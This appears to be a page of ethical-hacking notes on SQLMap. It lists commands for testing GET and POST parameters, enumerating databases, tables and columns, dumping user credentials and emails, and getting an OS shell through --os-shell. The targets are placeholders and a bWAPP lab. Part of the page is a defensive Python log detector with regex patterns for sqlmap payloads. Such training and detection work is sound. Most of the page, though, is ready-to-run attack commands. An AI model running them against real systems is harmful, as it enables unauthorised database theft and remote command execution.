# 4.3.6 SQLMap

## **SQLMap**

```bash
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>    # -r: saved raw HTTP request (e.g. from a proxy); -p: parameter to test
sqlmap -r Post.req

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

sqlmap -u "http://10.10.10.10/file.php?id=1" -p id                                  # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"          # POST method
```

### **Get databases if an injection exists**

```bash
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs                                  # enumerate the databases
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs                            # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs    # POST method

# List databases, then tables, then columns, then dump the selected columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
```

### **Get Tables in a Database**

```bash
sqlmap -r login.req -D dbname --tables                                              # enumerate the tables
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables              # if tables cannot be listed, guess them from a list of common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables               # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables    # POST method
```

### **Dump data from a database table**

```bash
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump   # GET method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump    # POST method
```

### **Get OS-Shell**

```bash
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell
```

## **Example of usage**

### **Dumping emails from a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump
```

**Common parameters**

* `-u`: The vulnerable URL.
* `-p`: The parameter you suspect is injectable.
* `--dbms=mysql`: Declares that the backend DBMS is known to be MySQL.
* `--level=5 --risk=3`: Runs the most extensive set of tests (`--level`) and allows the riskiest payloads (`--risk`).
* `--technique=EUBT`: Restricts sqlmap to four injection techniques: error-based (E), UNION query (U), boolean-based blind (B) and time-based blind (T).
* `-D ecommerce`: Targets the `ecommerce` database.
* `-T users`: Looks into the `users` table.
* `-C email`: Extracts only the `email` column.
* `--dump`: Retrieves the selected data rather than only enumerating it.
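The four technique families behind `--technique=EUBT` leave recognisable marks in a web server's access log. The detector below is an added example, not part of the original notes: it parses Apache/nginx combined-format lines, tags each request with the technique family its decoded payload matches, and flags a source IP that either announces sqlmap's default User-Agent or sends several payload-bearing requests. The log lines, IP addresses, version string and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# One pattern per sqlmap technique family (the E/U/B/T of --technique=EUBT), run over the decoded request path
TECHNIQUE_PATTERNS = {
    "E": re.compile(r"(EXTRACTVALUE|UPDATEXML|FLOOR\(RAND)\s*\(", re.I),        # error-based
    "U": re.compile(r"UNION\s+(ALL\s+)?SELECT", re.I),                          # UNION query
    "B": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),                       # boolean-based blind
    "T": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\b", re.I),  # time-based blind
}

def classify_line(line):
    """Parse one log line into (ip, technique tags hit, sqlmap User-Agent?) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))  # payloads arrive URL-encoded; match on the decoded form
    hits = {tag for tag, pat in TECHNIQUE_PATTERNS.items() if pat.search(decoded)}
    # sqlmap's default User-Agent begins with "sqlmap/"; --random-agent hides this, the payloads do not
    return m.group("ip"), hits, m.group("ua").lower().startswith("sqlmap/")

def suspicious_sources(lines, min_hits=3):
    """Aggregate per source IP and flag it on a sqlmap User-Agent or >= min_hits payload-bearing requests."""
    stats = defaultdict(lambda: {"requests": 0, "payload_hits": 0, "techniques": set(), "sqlmap_ua": False})
    for line in lines:
        parsed = classify_line(line)
        if parsed is None:
            continue
        ip, hits, is_sqlmap = parsed
        s = stats[ip]
        s["requests"] += 1
        if hits:
            s["payload_hits"] += 1
            s["techniques"] |= hits
        s["sqlmap_ua"] |= is_sqlmap
    return {ip: s for ip, s in stats.items() if s["sqlmap_ua"] or s["payload_hits"] >= min_hits}

# Constructed sample lines (not captured from a real server): one scanning host, one ordinary client
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /file.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /file.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 640 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /file.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /file.php?id=2 HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
]
```

Running `suspicious_sources(SAMPLE_LOG)` flags only `203.0.113.5`, with techniques `B`, `U` and `T` observed; a scan started with `--random-agent` would still be caught by the payload count once it crosses `min_hits`.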

### **Listing columns of a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Dumping usernames**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump
```

### **Listing columns of the `users` table again (useful for planning further dumps)**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Enumerating tables with a custom injection payload prefix/suffix**

```bash
# --prefix and --suffix are wrapped around every injected payload (e.g. to close a quoted or
# bracketed context in the original query); they do not filter table names
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables
```

{% content-ref url="https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap" %}
[SQLMap](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap)
{% endcontent-ref %}
